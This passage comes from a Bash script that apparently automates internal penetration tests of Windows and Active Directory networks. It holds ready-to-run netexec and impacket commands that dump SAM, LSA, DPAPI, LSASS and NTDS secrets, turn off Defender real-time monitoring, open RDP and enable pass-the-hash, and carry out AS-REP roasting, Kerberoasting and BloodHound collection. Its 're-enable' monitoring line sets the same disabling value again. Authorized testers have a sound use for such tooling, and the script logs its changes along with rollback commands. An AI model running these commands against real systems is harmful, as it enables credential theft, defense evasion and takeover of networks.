${DIR_VULNS}/smb/cme_${ip}_users |grep -av '\[.\]' | grep -v "\-BadPW\-" | awk '{for(i=5;i<=NF;i++) printf $i" "; print ""}' | \ 1234 | sed 's/.*\\//' | awk '{print $1}' >> ${ROOT_PATH}/users.txt 1235 | ## Supprimer les doublons 1236 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 1237 | sort -u ${ROOT_PATH}/users_with_descriptions.txt -o ${ROOT_PATH}/users_with_descriptions.txt 1238 | fi 1239 | 1240 | if [ "$admin" = "1" ] && [ "$soft" = "false" ]; then 1241 | ###### DUMP SAM ###### 1242 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} --sam < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_sam 2>/dev/null 1243 | check_smb=$(grep -ao '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_sam | wc -l) 1244 | 1245 | if [ "$check_smb" -gt 1 ]; then 1246 | green_log "${SPACE}${SPACE}[💀] Success dump SAM -> ${DIR_VULNS}/smb/cme_${ip}_sam" 1247 | fi 1248 | 1249 | ###### DUMP LSA ###### 1250 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} --lsa < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_lsa 2>/dev/null 1251 | check_smb=$(grep -ao '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_lsa | wc -l) 1252 | 1253 | if [ "$check_smb" -gt 1 ]; then 1254 | green_log "${SPACE}${SPACE}[💀] Success dump LSA -> ${DIR_VULNS}/smb/cme_${ip}_lsa" 1255 | fi 1256 | 1257 | ###### DUMP DPAPI ###### 1258 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} --dpapi < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_dpapi 2>/dev/null 1259 | check_smb=$(grep -oa 'Looting secrets' ${DIR_VULNS}/smb/cme_${ip}_dpapi | wc -l) 1260 | 1261 | if [ "$check_smb" -gt 0 ] && ! grep -q "No secrets found" ${DIR_VULNS}/smb/cme_${ip}_dpapi; then 1262 | green_log "${SPACE}${SPACE}[💀] Success dump DPAPI -> ${DIR_VULNS}/smb/cme_${ip}_dpapi" 1263 | fi 1264 | ##### IMPERSONATE ##### 1265 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} -M impersonate < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_impersonate 2>/dev/null 1266 | check_smb=$(grep -ao '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_impersonate | wc -l) 1267 | 1268 | if [ "$check_smb" -gt 1 ]; then 1269 | green_log "${SPACE}${SPACE}[💀] Success impersonnate -> ${DIR_VULNS}/smb/cme_${ip}_impersonate" 1270 | blue_log "${SPACE}${SPACE} [+] Possibility to exploit via : ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} -M impersonate -o TOKEN=1 EXEC='whoami'" 1271 | fi 1272 | 1273 | ###### COMMAND EXECUTION ###### 1274 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} -x "whoami" < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_cmd 2>/dev/null 1275 | check_smb=$(grep -ao '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_cmd | wc -l) 1276 | 1277 | if [ "$check_smb" -gt 1 ]; then 1278 | green_log "${SPACE}${SPACE}[💀] Success command execution" 1279 | 1280 | #Disabling RealTimeMonitoring 1281 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Set-MpPreference -DisableRealTimeMonitoring $true' < /dev/null > /dev/null 2>/dev/null 1282 | 1283 | #### Extract LSSAS only on VM that are not DC - to avoid possible crash .. 1284 | if [ $(cat ${DIR_PORTS}/88.txt | grep -aqi "${ip}"; echo $?) -eq 1 ]; then 1285 | ###### DUMP LSASS ###### 1286 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} -M lsassy < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_lsass 2>/dev/null 1287 | check_smb=$(grep -ao '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_lsass | wc -l) 1288 | 1289 | if [[ "$check_smb" -gt 0 ]] && ! grep -q "No credentials found" "${DIR_VULNS}/smb/cme_${ip}_lsass"; then 1290 | green_log "${SPACE}${SPACE}[💀] Success dump LSASS.EXE -> ${DIR_VULNS}/smb/cme_${ip}_lsass" 1291 | fi 1292 | else 1293 | ##### NTDS extract ##### 1294 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} --ntds < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_ntds 2>/dev/null 1295 | check_smb=$(grep -ao '\[+\]' ${DIR_VULNS}/smb/cme_${ip}_ntds | wc -l) 1296 | 1297 | if [ "$check_smb" -gt 1 ]; then 1298 | green_log "${SPACE}${SPACE}[💀] Success dump NTDS -> ${DIR_VULNS}/smb/cme_${ip}_ntds" 1299 | fi 1300 | fi 1301 | 1302 | #Check for disconnected RDP sessions 1303 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} -x 'query user' < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_cmd_rdp 2>/dev/null 1304 | check_smb=$(grep -aEi 'Déco|Deco|Dis' ${DIR_VULNS}/smb/cme_${ip}_cmd_rdp | wc -l) 1305 | if [ "$check_smb" -gt 0 ]; then 1306 | green_log "${SPACE}${SPACE}[💀] Found RDP session disconnected -> ${DIR_VULNS}/smb/cme_${ip}_cmd_rdp" 1307 | fi 1308 | #If RDP is not enabled 1309 | if ! grep -q "${ip}" ${DIR_PORTS}/3389.txt;then 1310 | #Enable RDP in registry 1311 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_enabling_rdp 2>/dev/null 1312 | #Allow RDP connexion on the machine 1313 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes' < /dev/null >> ${DIR_VULNS}/smb/cme_${ip}_enabling_rdp 2>/dev/null 1314 | actual_modification="${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes'" 1315 | future_modification="${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'netsh advfirewall firewall set rule group=\"remote desktop\" new enable=No'" 1316 | if ! grep -i 'Ok.' ${DIR_VULNS}/smb/cme_${ip}_enabling_rdp; then 1317 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'netsh advfirewall firewall set rule group="Bureau à distance" new enable=Yes' < /dev/null >> ${DIR_VULNS}/smb/cme_${ip}_enabling_rdp 2>/dev/null 1318 | #overwrite the $actual_modification and $future_modification variables if necessary 1319 | actual_modification="${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'netsh advfirewall firewall set rule group=\"Bureau à distance\" new enable=Yes'" 1320 | future_modification="${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'netsh advfirewall firewall set rule group=\"Bureau à distance\" new enable=No'" 1321 | fi 1322 | #Restart RDP service on the machine 1323 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Restart-Service -Force -Name "TermService"' < /dev/null >> ${DIR_VULNS}/smb/cme_${ip}_enabling_rdp 2>/dev/null 1324 | #Check the RDP service 1325 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Get-Service -Name "TermService"' < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_status_post_enabling_rdp 2>/dev/null 1326 | if grep -qi 'Running' ${DIR_VULNS}/smb/cme_${ip}_status_post_enabling_rdp;then 1327 | orange_log "${SPACE}${SPACE}[💀] RDP is now activate (it wasn't) on $host (${ip}) -> Changement added in ${ROOT_PATH}/modifs.txt" 1328 | echo -e "\nACTION : Enabling RDP on $host (${ip}" >> ${ROOT_PATH}/modifs.txt 1329 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f'" >> ${ROOT_PATH}/modifs.txt 1330 | echo "$actual_modification" >> ${ROOT_PATH}/modifs.txt 1331 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Restart-Service -Force -Name \"TermService\"'" >> ${ROOT_PATH}/modifs.txt 1332 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Get-Service -Name \"TermService\"'" >> ${ROOT_PATH}/modifs.txt 1333 | echo "CORRECTION ->" >> ${ROOT_PATH}/modifs.txt 1334 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f'" | tee -a ${ROOT_PATH}/modifs.txt ${ROOT_PATH}/modifs_automation.txt > /dev/null 1335 | echo "$future_modification" | tee -a ${ROOT_PATH}/modifs.txt ${ROOT_PATH}/modifs_automation.txt > /dev/null 1336 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Stop-Service -Force -Name \"TermService\"'" | tee -a ${ROOT_PATH}/modifs.txt ${ROOT_PATH}/modifs_automation.txt > /dev/null 1337 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Get-Service -Name \"TermService\"'" | tee -a ${ROOT_PATH}/modifs.txt ${ROOT_PATH}/modifs_automation.txt > /dev/null 1338 | echo "${ip}" >> ${DIR_PORTS}/3389.txt 1339 | else 1340 | rm ${DIR_VULNS}/smb/cme_${ip}_status_post_enabling_rdp 1341 | fi 1342 | fi 1343 | ###### RESTRICTED ADMIN ##### 1344 | # Will permit to connect with NTLM Hash 1345 | ${proxychains} timeout ${CME_TIMEOUT} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'reg query HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin' < /dev/null > ${DIR_VULNS}/smb/cme_${ip}_cmd_rdp_restricted 2>/dev/null 1346 | 1347 | check_smb=$(grep -aEi '0x0' ${DIR_VULNS}/smb/cme_${ip}_cmd_rdp_restricted | wc -l) 1348 | if [ "$check_smb" -gt 0 ]; then 1349 | red_log "${SPACE}[!] Pass-The-Hash already allowed for RDP ! -> Possible old compromission" 1350 | rm ${DIR_VULNS}/smb/cme_${ip}_cmd_rdp_restricted 1351 | else 1352 | ${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x1 /f' < /dev/null ${DIR_VULNS}/smb/cme_${ip}_cmd_rdp_restricted 2>/dev/null 1353 | orange_log "${SPACE}${SPACE}[💀] New possibility to Pass-The-Hash enabled on RDP -> Changement added in ${ROOT_PATH}/modifs.txt" 1354 | echo -e "\nACTION :" >> ${ROOT_PATH}/modifs.txt 1355 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'" >> ${ROOT_PATH}/modifs.txt 1356 | echo "CORRECTION ->" >> ${ROOT_PATH}/modifs.txt 1357 | echo "${proxychains} netexec smb ${host} -u "${Username}" ${cme_creds} ${kerberos} -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x1 /f'" | tee -a ${ROOT_PATH}/modifs.txt ${ROOT_PATH}/modifs_automation.txt > /dev/null 1358 | fi 1359 | 1360 | #Re-enabling RealTimeMonitoring 1361 | ${proxychains} netexec smb $host -u "${Username}" ${cme_creds} ${kerberos} -x 'powershell Set-MpPreference -DisableRealTimeMonitoring $true' < /dev/null 1362 | 1363 | fi 1364 | fi 1365 | fi 1366 | fi 1367 | done 1368 | fi 1369 | } 1370 | 1371 | bloodhound () { 1372 | if [[ -e "${DIR_PORTS}/88.txt" ]]; then 1373 | mkdir ${ROOT_PATH}/bloodhound 2>/dev/null 1374 | DC_ip=$(cat "${DIR_PORTS}/88.txt" | head -n 1) 1375 | hostname=$(grep -E "^$DC_ip:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1376 | DC_host="${hostname}" 1377 | domain=$(echo "${hostname}" | cut -d '.' -f 2-) 1378 | log "[🔍] BloodHound CE collection ..." 1379 | if [[ "${Username}" != "anonymous" ]]; then 1380 | if [ -n "$NT_Hash" ]; then 1381 | ${proxychains} bloodhound-ce-python --zip -c All -d ${domain} -u ${Username} -hashes ":${NT_Hash}" -dc ${DC_host} -o "${ROOT_PATH}/bloodhound/" > /dev/null 2>&1 1382 | else 1383 | ${proxychains} bloodhound-ce-python --zip -c All -d ${domain} -u ${Username} -p ${Password} -dc ${DC_host} -o "${ROOT_PATH}/bloodhound/" > /dev/null 2>&1 1384 | fi 1385 | fi 1386 | recent_file=$(find "${ROOT_PATH}/bloodhound" -maxdepth 1 -name '*bloodhound.zip' -type f -newermt '5 seconds ago') 1387 | if [ -n "${recent_file}" ]; then 1388 | blue_log "${SPACE}[+] A new BloodHound CE collection is available: ${recent_file}" 1389 | fi 1390 | fi 1391 | } 1392 | 1393 | users () { 1394 | if [[ -e "${DIR_PORTS}/88.txt" ]]; then 1395 | DC_ip=$(cat "${DIR_PORTS}/88.txt" | head -n 1) 1396 | hostname=$(grep -E "^$DC_ip:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1397 | DC_host="${hostname}" 1398 | domain=$(echo "${hostname}" | cut -d '.' -f 2-) 1399 | log "[🔍] Extracting AD users ..." 1400 | if [[ "${Username}" != "anonymous" ]]; then 1401 | if [ -n "$NT_Hash" ]; then 1402 | ${proxychains} impacket-getTGT -hashes ":${NT_Hash}" $domain/${Username} -dc-ip ${DC_host} > /dev/null 2>&1 1403 | else 1404 | ${proxychains} impacket-getTGT $domain/${Username}:${Password} -dc-ip ${DC_host} > /dev/null 2>&1 1405 | fi 1406 | fi 1407 | if [[ -e "${Username}.ccache" ]]; then 1408 | export KRB5CCNAME=${Username}.ccache 1409 | AD_Users=$(${proxychains} impacket-GetADUsers $domain/${Username} -no-pass -dc-host ${DC_host} -k -all | awk -F " " '{print $1}' | sed '1,6d') 1410 | unset KRB5CCNAME 1411 | rm ${Username}.ccache 1412 | if [[ -n "$AD_Users" ]]; then 1413 | green_log "${SPACE}[💀] Great, successful extraction -> ${ROOT_PATH}/users.txt" 1414 | echo "$AD_Users" >> ${ROOT_PATH}/users.txt 1415 | sort -u ${ROOT_PATH}/users.txt -o ${ROOT_PATH}/users.txt 1416 | fi 1417 | fi 1418 | fi 1419 | } 1420 | 1421 | ########################### Kerberos ############################### 1422 | asp (){ 1423 | if [[ -e "${DIR_PORTS}/88.txt" ]]; then 1424 | DC_ip=$(cat "${DIR_PORTS}/88.txt" | head -n 1) 1425 | hostname=$(grep -E "^$DC_ip:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1426 | DC_host="${hostname}" 1427 | domain=$(echo "${hostname}" | cut -d '.' -f 2-) 1428 | mkdir ${DIR_VULNS}/krb 2>/dev/null 1429 | log "[🔍] Starting asreproasting attack ..." 1430 | if [[ "${Username}" != "anonymous" ]]; then 1431 | if [ -n "$NT_Hash" ]; then 1432 | ${proxychains} impacket-getTGT -hashes ":${NT_Hash}" $domain/${Username} -dc-ip ${DC_host} > /dev/null 2>&1 1433 | else 1434 | ${proxychains} impacket-getTGT $domain/${Username}:${Password} -dc-ip ${DC_host} > /dev/null 2>&1 1435 | fi 1436 | fi 1437 | if [[ -e "${Username}.ccache" ]]; then 1438 | export KRB5CCNAME=${Username}.ccache 1439 | ${proxychains} impacket-GetNPUsers $domain/${Username} -no-pass -dc-host ${DC_host} -k -request -outputfile ${DIR_VULNS}/krb/asreproasting_Users.txt > /dev/null 2>&1 1440 | unset KRB5CCNAME 1441 | rm ${Username}.ccache 1442 | else 1443 | ${proxychains} impacket-GetNPUsers -dc-ip $DC_ip -no-pass -request -usersfile ${ROOT_PATH}/users.txt $domain/ -outputfile ${DIR_VULNS}/krb/asreproasting_Users.txt > /dev/null 2>&1 1444 | fi 1445 | if grep -q 'asrep' "${DIR_VULNS}/krb/asreproasting_Users.txt"; then 1446 | green_log "${SPACE}[💀] Great, there are asreproastable accounts found -> ${DIR_VULNS}/krb/asreproasting_Users.txt" 1447 | blue_log "${SPACE} [+] Use hashcat -m 18200 ... to bang them passwords" 1448 | elif grep -q 'KDC_ERR_KEY_EXPIRED' "${DIR_VULNS}/krb/asreproasting_Users.txt"; then 1449 | green_log "${SPACE}[💀] Found asreproastable accounts BUT all have expired passwords -> ${DIR_VULNS}/krb/asreproasting_Users.txt" 1450 | fi 1451 | fi 1452 | } 1453 | 1454 | krb () { 1455 | if [[ -e "${DIR_PORTS}/88.txt" ]]; then 1456 | DC_ip=$(cat "${DIR_PORTS}/88.txt" | head -n 1) 1457 | hostname=$(grep -E "^$DC_ip:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1458 | #DC_host="$(echo ${hostname} | cut -d '.' -f 1)" 1459 | DC_host="${hostname}" 1460 | domain=$(echo "${hostname}" | cut -d '.' -f 2-) 1461 | mkdir ${DIR_VULNS}/krb 2>/dev/null 1462 | log "[🔍] Checking SPN users (kerberoast) ..." 1463 | if [[ "${Username}" != "anonymous" ]]; then 1464 | if [ -n "$NT_Hash" ]; then 1465 | ${proxychains} impacket-getTGT -hashes ":${NT_Hash}" $domain/${Username} -dc-ip ${DC_host} > /dev/null 2>&1 1466 | else 1467 | ${proxychains} impacket-getTGT $domain/${Username}:${Password} -dc-ip ${DC_host} > /dev/null > /dev/null 2>&1 1468 | fi 1469 | fi 1470 | if [[ -e "${Username}.ccache" ]]; then 1471 | export KRB5CCNAME=${Username}.ccache 1472 | rm ${DIR_VULNS}/krb/Kerberoasting_SPN_Users.txt 1473 | ${proxychains} impacket-GetUserSPNs $domain/${Username} -no-pass -k -request -dc-host ${DC_host} > ${DIR_VULNS}/krb/Kerberoasting_SPN_Users.txt 1474 | else 1475 | if [[ -e "${DIR_VULNS}/krb/asreproasting_Users.txt" ]];then 1476 | while IFS= read -r line; do 1477 | asp_user=$(echo "$line" |awk -F'$' '{print $4}' |awk -F'@' '{print $1}') 1478 | ${proxychains} impacket-GetUserSPNs -no-preauth $asp_user -usersfile ${ROOT_PATH}/users.txt -dc-host ${DC_host} -request $domain/ > ${DIR_VULNS}/krb/Kerberoasting_SPN_Users_preauth.txt 1479 | done < "${DIR_VULNS}/krb/asreproasting_Users.txt" 1480 | grep -s "krb5tgs" ${DIR_VULNS}/krb/Kerberoasting_SPN_Users_preauth.txt >> ${DIR_VULNS}/krb/Kerberoasting_SPN_Users.txt 1481 | fi 1482 | fi 1483 | 1484 | if [ -e "${DIR_VULNS}/krb/Kerberoasting_SPN_Users.txt" ] && ! grep -qs 'No entries' "${DIR_VULNS}/krb/Kerberoasting_SPN_Users.txt"; then 1485 | green_log "${SPACE}[💀] Great, kerberoastable accounts found -> ${DIR_VULNS}/krb/Kerberoasting_SPN_Users.txt" 1486 | blue_log "${SPACE} [+] Use hashcat -m 13100 ... to bang them passwords" 1487 | fi 1488 | 1489 | #delegation 1490 | log "[🔍] Searching delegations .." 1491 | if [[ -e "${Username}.ccache" ]]; then 1492 | export KRB5CCNAME=${Username}.ccache 1493 | ${proxychains} impacket-findDelegation $domain/${Username} -no-pass -k -dc-host ${DC_host} > ${DIR_VULNS}/krb/Delegations.txt 1494 | unset KRB5CCNAME 1495 | rm ${Username}.ccache 1496 | fi 1497 | if grep -qs 'AccountName' ${DIR_VULNS}/krb/Delegations.txt;then 1498 | echo $delegation_request >> ${DIR_VULNS}/Vulns_delegation.txt; 1499 | green_log "[💀] Delegations found -> ${DIR_VULNS}/krb/Delegations.txt" 1500 | fi 1501 | fi 1502 | } 1503 | 1504 | 1505 | web () { 1506 | # Parcourir le fichier Nmap 1507 | log "[🔍] Checking Web Servers ..." 1508 | while IFS= read -r line; do 1509 | if [[ $line == "Nmap scan report for"* ]]; then 1510 | # Extraire l'adresse IP 1511 | ip=$(echo "$line" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}') 1512 | hostname=$(grep -E "^${ip}:" ${ROOT_PATH}/hostname_file.txt | awk -F ":" '{print $2}') 1513 | elif [[ $line =~ ^([0-9]+)/tcp ]]; then 1514 | port="${BASH_REMATCH[1]}" 1515 | if control_ip_attack; then 1516 | # Extract port number and protocol 1517 | if [[ "$line" =~ http|https ]] && [[ ! "$line" =~ ncacn_http ]] && [[ "$port" != "5985" && "$port" != "5986" && "$port" != "5357" ]]; then 1518 | echo $line 1519 | whatweb ${ip}:${port} --log-brief=/tmp/whatweb >/dev/null 2>&1 1520 | HTTPServer=$(cat /tmp/whatweb | tail -n 1 | grep -oP 'HTTPServer\[\K[^\]]+' || echo "No HTTPServer identified") 1521 | Title=$(cat /tmp/whatweb | tail -n 1 | grep -oP 'Title\[\K[^\]]+' || echo "No title identified") 1522 | green_log "${SPACE}${ip}:${port} (${hostname}) -> ${HTTPServer} /// ${Title}" 1523 | rm /tmp/whatweb 1524 | fi 1525 | # Ajouter l'IP à son fichier correspondant 1526 | #echo "${ip}" >> "${DIR_PORTS}/${port}.txt" 1527 | fi 1528 | fi 1529 | done < "${ROOT_PATH}/scan_nmap/scan_Fast_TCP.nmap" 1530 | } 1531 | 1532 | nmap_full () { 1533 | 1534 | PORTS_FOUND=$(ls ${DIR_PORTS}/*.txt | xargs -n 1 basename | sed 's/\.txt$//' | paste -sd ",") 1535 | log "[🔍] Scanning NMAP - Full version" 1536 | 1537 | if [ -n "${proxychains}" ]; then 1538 | #Proxychains ne comprenant pas les requetes personnalisé, nous lui indiqueront de faire des requetes full (sT) 1539 | #${proxychains} nmap -Pn -A -sT -sCV -iL ${ROOT_PATH}/hosts.txt -oA ${ROOT_PATH}/scan_nmap/scan_Full_TCP -p${PORTS_FOUND} --open >/dev/null 2>&1 1540 | if [ -e ${ROOT_PATH}/scan_nmap/scan_Fast_TCP.nmap ];then 1541 | cp ${ROOT_PATH}/scan_nmap/scan_Fast_TCP.nmap ${ROOT_PATH}/scan_nmap/scan_Full_TCP.nmap 1542 | cp ${ROOT_PATH}/scan_nmap/scan_Fast_TCP.xml ${ROOT_PATH}/scan_nmap/scan_Full_TCP.xml 1543 | else 1544 | blue_log "Do a more in depth nmap on the distant internal network to continue :" 1545 | blue_log "nmap -Pn -A -sT -sCV $rangeIP -oA scan_Full_TCP -p- --open" 1546 | blue_log "Then exfiltrate nmap reports to '${ROOT_PATH}/scan_nmap/' on the attacker's machine" 1547 | log "Press Entrer when ready ..." 1548 | read 1549 | nmap_full 1550 | fi 1551 | else 1552 | nmap -sT -Pn -A -sCV -T4 -iL ${ROOT_PATH}/hosts.txt -oA ${ROOT_PATH}/scan_nmap/scan_Full_TCP -p${PORTS_FOUND} --open >/dev/null 2>&1 1553 | 1554 | fi 1555 | 1556 | #Deleting useless files 1557 | if [ -n "$(ls ${ROOT_PATH}/scan_nmap/*.gnmap 2>/dev/null)" ]; then 1558 | rm ${ROOT_PATH}/scan_nmap/*.gnmap 1559 | fi 1560 | 1561 | xsltproc ${ROOT_PATH}/scan_nmap/scan_Full_TCP.xml -o ${ROOT_PATH}/scan_Full_TCP.html 1562 | 1563 | log "${SPACE}File TCP in HTML format available to -> ${ROOT_PATH}/scan_Full_TCP.html" 1564 | log "${SPACE}File UDP in HTML format available to -> ${ROOT_PATH}/scan_Full_UDP_open.html" 1565 | } 1566 | 1567 | ########################### TREE COMMAND ################################## 1568 | say_bye () { 1569 | echo "⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐" >> $logfile 1570 | echo "$(tree ${ROOT_PATH})" 1571 | echo "$(tree ${ROOT_PATH})" >> $logfile 1572 | echo "⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐" >> $logfile 1573 | log "Elapsed Time: $(python3 -c "import datetime;print(str(datetime.timedelta(seconds=$(( SECONDS - start )))))")" 1574 | log "Good Bye !!" 1575 | exit 1576 | } 1577 | 1578 | 1579 | # Déclaration des fonctions 1580 | declare -a functions=(nmap_fast relay manspider vulns ftp ssh winrm rdp smtp nfs vnc zt printers snmp ldap ipmi mssql smb bloodhound users asp krb web nmap_full) 1581 | declare -a functions_long_names=("Scan open ports and service versions (need to be done at least 1 time at the begin of a project)" "Launch Responder and NTLMRelayx" "Search for sensitive data (passwords, usernames...) on SMB shares" "Check for ms17-010, NoPac, Zerologon, MSOL creds, GPP_autologin, GPP_password, ..." "Enumerate FTP services" "Enumerate SSH services" "Enumerate WinRM services" "Enumerate WinRM services" "Enumerate SMTP services" "Enumerate NFS shares" "Enumerate VNC services" "Attempt DNS zone transfers" "Identify reachable printers" "Search for public SNMP communities" "Anonymous LDAP enumeration" "IPMI service enumeration" "Attempt MSSQL authentication" "Check anonymous/guest access, shares, users, LSA, DPAPI, ..." "Collect data for BloodHound Community Edition (equivalent to SharpHound/Ingestor)" "Enumerate Active Directory users (Get-ADUsers)" "Attempt AS-REP Roasting attack" "Attempt Kerberoasting attack" "Identify web services" "Deep Nmap scan") 1582 | ################### HELP ############################## 1583 | Help() { 1584 | echo "Usage: $0 -o ProjectName -i Interface -t rangeIP [-u Username [-p Password | -n NT_Hash]] [-f | -e nmap_fast | -s smb,vnc] [-m [basic | no-ping]]" 1585 | echo 1586 | echo "Options:" 1587 | echo " -o Project name (output directory)" 1588 | echo " -i Network interface" 1589 | echo " -t IP range (e.g., 192.168.0.0/24,192.168.1.128/27). /32 must be used for individual IP addresses." 1590 | echo " -u Username (optional)" 1591 | echo " -p Password (optional, either Password or NT_Hash must be provided, can be empty)" 1592 | echo " -H NTLM Hash (optional, either Password or NT_Hash must be provided, can be empty)" 1593 | echo " -f Execute all functions" 1594 | echo " -e Execute all functions except specified ones (-e rdp,winrm)" 1595 | echo " -s Execute only specified functions (-s rdp,winrm)" 1596 | echo " -m Discovery mode (default: basic). basic = ARP + ping (faster, may miss hosts); no-ping = skip ping (slower, more accurate)" 1597 | echo " -M Modifications or alerts on target systems may be performed (e.g., SAM / LSA / LSASS / DPAPI / NTDS extraction, RDP enabling)" 1598 | echo " -r Restore modifications made to targets" 1599 | echo " -h Display help" 1600 | echo 1601 | echo "Available functions:" 1602 | for i in "${!functions[@]}"; do 1603 | printf " - %-12s : %s\n" "${functions[$i]}" "${functions_long_names[$i]}" 1604 | done 1605 | exit 1 1606 | } 1607 | 1608 | while getopts "o:i:u:p:H:t:e:s:m:fhMr" option; do 1609 | case $option in 1610 | o) ProjectName=$OPTARG;; 1611 | i) INTERFACE=$OPTARG;; 1612 | u) Username=$OPTARG;; 1613 | p) Password=$OPTARG;; 1614 | H) NT_Hash=$OPTARG;; 1615 | t) rangeIP=$OPTARG;; 1616 | f) execute_all=true;; 1617 | e) excluded_funcs=$OPTARG;; 1618 | s) selected_funcs=$OPTARG;; 1619 | m) discovery_mode=$OPTARG;; 1620 | M) soft=false;; 1621 | r) restore=true;; 1622 | h) Help;; 1623 | \?) echo "Erreur : Option invalide"; Help;; 1624 | esac 1625 | done 1626 | 1627 | # Check mandatory parameters 1628 | if [[ -z "$ProjectName" || -z "$INTERFACE" || -z "$rangeIP" ]]; then 1629 | echo "Error :All mandatory parameters have to be set." 1630 | Help 1631 | exit 1 1632 | fi 1633 | 1634 | # Check Password / NT_Hash 1635 | if [[ -n "${Password}" && -n "$NT_Hash" ]]; then 1636 | echo "Error : You can't set Password and NTLMHash in the same time." 1637 | exit 1 1638 | fi 1639 | 1640 | #If discovery_mode is not defined 1641 | if [[ -z "$discovery_mode" || "$discovery_mode" == "basic" ]]; then 1642 | discovery_mode="arp-ping" 1643 | elif [[ "$discovery_mode" != "no-ping" ]]; then 1644 | echo "Error : discovery_mode must be 'basic' or 'no-ping'." 1645 | exit 1 1646 | fi 1647 | 1648 | # Execute all functions 1649 | if [[ $execute_all ]]; then 1650 | domain="" 1651 | starter 1652 | for f in ${functions[@]}; do 1653 | $f 1654 | done 1655 | say_bye 1656 | fi 1657 | 1658 | # Execute specific functions 1659 | if [[ -n "$selected_funcs" ]]; then 1660 | starter 1661 | IFS=',' read -ra selected_funcs_arr <<< "$selected_funcs" 1662 | for f in ${functions[@]}; do 1663 | for s in "${selected_funcs_arr[@]}"; do 1664 | if [ "$s" == "$f" ];then 1665 | $s 1666 | fi 1667 | done 1668 | done 1669 | say_bye 1670 | fi 1671 | 1672 | # Exclude some functions 1673 | if [[ -n "$excluded_funcs" ]]; then 1674 | starter 1675 | IFS=',' read -ra excluded_funcs_arr <<< "$excluded_funcs" 1676 | for f in "${functions[@]}"; do 1677 | if [[ ! " ${excluded_funcs_arr[@]} " =~ " ${f} " ]]; then 1678 | $f 1679 | fi 1680 | done 1681 | say_bye 1682 | fi 1683 | 1684 | # 